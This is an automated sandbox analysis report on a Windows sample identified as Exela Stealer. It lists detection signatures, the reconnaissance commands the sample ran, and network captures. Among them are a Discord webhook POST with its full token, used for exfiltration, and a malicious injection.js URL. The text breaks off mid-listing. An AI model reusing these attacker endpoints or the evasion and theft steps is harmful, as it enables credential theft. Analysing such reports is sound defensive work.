Windows Analysis Report
SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe

Overview

General Information

Sample name: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
Analysis ID: 1431281
MD5: d53e9b9d10affcf90e613abccc702ca2
SHA1: 24849b1a515347a75804d53c483ce6dffc78dbcc
SHA256: 0bcfadb848694ee56bf3fad6c3a9df4fde2d60cd52ce2a16be42b06fda520812
Tags: exe
Infos:

Detection

Exela Stealer, Python Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Add file from suspicious location to autostart registry
Sigma detected: Capture Wi-Fi password
Yara detected Exela Stealer
Yara detected Python Stealer
Detected generic credential text file
Found many strings related to Crypto-Wallets (likely being stolen)
Gathers network related connection and port information
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Modifies the windows firewall
Overwrites the password of the administrator account
Performs a network lookup / discovery via ARP
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)
Sigma detected: MSHTA Suspicious Execution 01
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses attrib.exe to hide files
Uses ipconfig to lookup or modify the Windows network settings
Uses netsh to modify the Windows network and firewall settings
Uses netstat to query active network connections and open ports
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Queries time zone information
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Sigma detected: Console CodePage Lookup Via CHCP
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Suspicious Group And Account Reconnaissance Activity Using Net.EXE
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Avira: detected
Antivirus detection for URL or domain
Source: https://raw.githubusercontent.com/justforExela/injection/main/injection.js Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Avira: detection malicious, Label: HEUR/AGEN.1306040
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe ReversingLabs: Detection: 39%
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe ReversingLabs: Detection: 39%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Joe Sandbox ML: detected

Phishing
barindex
Overwrites the password of the administrator account
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net user administrator
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net user administrator
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: crypto\engine\tb_digest.cENGINE_get_digestcrypto\buffer\buffer.cBUF_MEM_growBUF_MEM_grow_cleancrypto\packet.ccompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specific.dllCPUINFO: crypto\initthread.cOPENSSL_ia32cap source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003420709.00007FFDFA701000.00000040.00000001.01000000.0000001E.sdmp
Source: Binary string: tRSA_PRIME_INFOeqdmp1dmq1iqmpprime_infosRSAPrivateKeyRSAPublicKeyhashAlgorithmmaskGenAlgorithmsaltLengthtrailerFieldRSA_PSS_PARAMShashFuncmaskGenFuncpSourceFuncRSA_OAEP_PARAMScompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"3.2.1built on: Fri Feb 23 00:13:44 2024 UTCplatform: VC-WIN64AOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availablecrypto\init.cOPENSSL_init_cryptocrypto\bio\bio_lib.cBIO_new_exbio_read_internbio_write_internBIO_sendmmsgBIO_recvmmsgBIO_putsBIO_getsBIO_get_line BIO_ctrlBIO_callback_ctrlBIO_find_type source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003420709.00007FFDFA701000.00000040.00000001.01000000.0000001E.sdmp
Source: Binary string: C:\Users\runneradmin\AppData\Local\Temp\pip-req-build-csg7dlje\src\rust\target\release\deps\cryptography_rust.pdb source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003420709.00007FFDFA701000.00000040.00000001.01000000.0000001E.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\python3.pdb source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657012917.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1986952157.000002DCCEDE0000.00000002.00000001.01000000.00000006.sdmp, Exela.exe, 00000051.00000003.1831588046.0000023B784A6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1650799388.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1803607087.0000023B784A2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\runneradmin\AppData\Local\Temp\pip-req-build-csg7dlje\src\rust\target\release\deps\cryptography_rust.pdbo source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003420709.00007FFDFA701000.00000040.00000001.01000000.0000001E.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003420709.00007FFDFA701000.00000040.00000001.01000000.0000001E.sdmp

Spreading
barindex
Performs a network lookup / discovery via ARP
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ARP.EXE arp -a
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ARP.EXE arp -a
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Code function: 0_2_00007FF72AA8842C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError, 0_2_00007FF72AA8842C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Code function: 0_2_00007FF72AA78AF0 FindFirstFileExW,FindClose, 0_2_00007FF72AA78AF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Code function: 0_2_00007FF72AA924C4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 0_2_00007FF72AA924C4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Code function: 0_2_00007FF72AA8842C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError, 0_2_00007FF72AA8842C
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Code function: 81_2_00007FF6E3A7842C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError, 81_2_00007FF6E3A7842C
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Code function: 81_2_00007FF6E3A68AF0 FindFirstFileExW,FindClose, 81_2_00007FF6E3A68AF0
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Code function: 81_2_00007FF6E3A824C4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 81_2_00007FF6E3A824C4
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Code function: 81_2_00007FF6E3A7842C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError, 81_2_00007FF6E3A7842C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg Jump to behavior

Networking
barindex
Uses netstat to query active network connections and open ports
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\NETSTAT.EXE netstat -ano
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View IP Address: 162.159.137.232 162.159.137.232
Source: Joe Sandbox View IP Address: 162.159.128.233 162.159.128.233
May check the online IP address of the machine
Source: unknown DNS query: name: ip-api.com
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /getServer HTTP/1.1Host: api.gofile.ioAccept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.9.3
Source: global traffic HTTP traffic detected: GET /json HTTP/1.1Host: ip-api.comAccept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.9.3
Source: global traffic DNS traffic detected: DNS query: ip-api.com
Source: global traffic DNS traffic detected: DNS query: discord.com
Source: global traffic DNS traffic detected: DNS query: api.gofile.io
Source: global traffic DNS traffic detected: DNS query: store8.gofile.io
Source: unknown HTTP traffic detected: POST /api/webhooks/1232453561850531851/OBetju49bFsNbzWeG3Y_1O_or46pmBaTOUd7HjjHcO5X_BaLZ2C-YJ8xGzkF6VbqbsY0 HTTP/1.1Host: discord.comContent-Type: application/jsonAccept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.9.3Content-Length: 1381
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 17:24:19 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=7bd0627c025f11efa7d31a4199c9fe48; Expires=Mon, 23-Apr-2029 17:24:19 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1713979460x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fODZtPEW%2BMTNE%2BaVAjSqZSYXk1o3MBVDJIR7Nwuw2Hs3icT1kmLI%2F%2FoNzv7BLn8yylT04AkpCEqTHQhlfmk4Z8a0EUMSuZY3gnxp08DLvQHs5EAGZCb8x5Q2Gm2r"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=7bd0627c025f11efa7d31a4199c9fe48c4f5e57f9711b81ede957149357073dc7775ed4571b99598883e1a480d310fd4; Expires=Mon, 23-Apr-2029 17:24:19 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=22bfe7b5e874aa62114a8089515824a77160f218-1713979459; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 17:24:20 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=7c49fd12025f11efbdd8ee7b659d56a8; Expires=Mon, 23-Apr-2029 17:24:20 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1713979461x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d13Kl274CV7G76C%2Ft8Na4Gy%2Fhu6x4Cje3c0er8fa6KYbZLuuBMjuobnDEek3ZJ4eq91RxNxYVn3xnNSMGmxve6lZQKNl%2BUFBC8jkdp4Ob4ouxwLztCV0MLHH0zER"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=7c49fd12025f11efbdd8ee7b659d56a8d44545b7b642815a6a554183e4e71fc97bf076171c2e94722355f6e2d4d6f95a; Expires=Mon, 23-Apr-2029 17:24:20 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=0f8d95718fc85af237794a7b11ac27ff3aa11215-1713979460; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 17:24:21 GMTContent-Type: application/jsonContent-Length: 45Connection: closestrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1713979463x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m8Ey646mwNRy1SWKeH6xTZtK15gcdbjSssffHYufv5o%2FsoLMY7RBfTafqs9uXabQkf1jSDu6EpHDpxWSBV%2BK0L58QN01rubBeGE7s52Q7zsk1xkYcl7RhY%2BTvRgR"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Server: cloudflareCF-RAY: 8797c94d8fe809f3-LAS
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 17:24:28 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=81608906025f11efb039be452c0845c9; Expires=Mon, 23-Apr-2029 17:24:28 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1713979470x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8pyMWczbleQALJS%2BMQCD44S9SoXDnwVNjYlOGYcGpHbcPsbt3ugBUdVdoWGwQ57MMKdlAbt9Moc4yO9Fxd%2By6lynJefgXGXeHaUfp1xw3FQKDIB1uhHcM8kChF%2F8"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=81608906025f11efb039be452c0845c9902407b9c63a87615a9b24dbfd4ff0121e3e8bb9ff0365232310f373b2ba71f9; Expires=Mon, 23-Apr-2029 17:24:28 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=418df2eda9f10ccb09d5126301cea6bca0418ed5-1713979468; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656121294.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656121294.000001FC75815000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1830677200.0000023B784B3000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1830677200.0000023B784A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651594328.000001FC7580F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651004020.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651489697.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651827238.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652100311.000001FC75806000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656536234.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651594328.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1655357139.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651745342.000001FC7580F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651915607.000001FC75803000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657899166.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1650926851.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1658168645.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657238771.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657738135.000001FC75815000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651284062.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656220023.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652009836.000001FC75805000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651407307.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651676745.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657738135.000001FC75808000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656121294.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1830677200.0000023B784A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656121294.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1830677200.0000023B784A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651004020.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651489697.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651827238.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652100311.000001FC75806000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656536234.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651594328.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1655357139.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651915607.000001FC75803000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657899166.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1650926851.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1658168645.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657238771.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651284062.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656220023.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652009836.000001FC75805000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651407307.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651676745.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657738135.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651745342.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651188730.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657012917.000001FC75808000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651004020.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651489697.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651827238.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652100311.000001FC75806000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656536234.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651594328.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1655357139.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651915607.000001FC75803000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657899166.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, 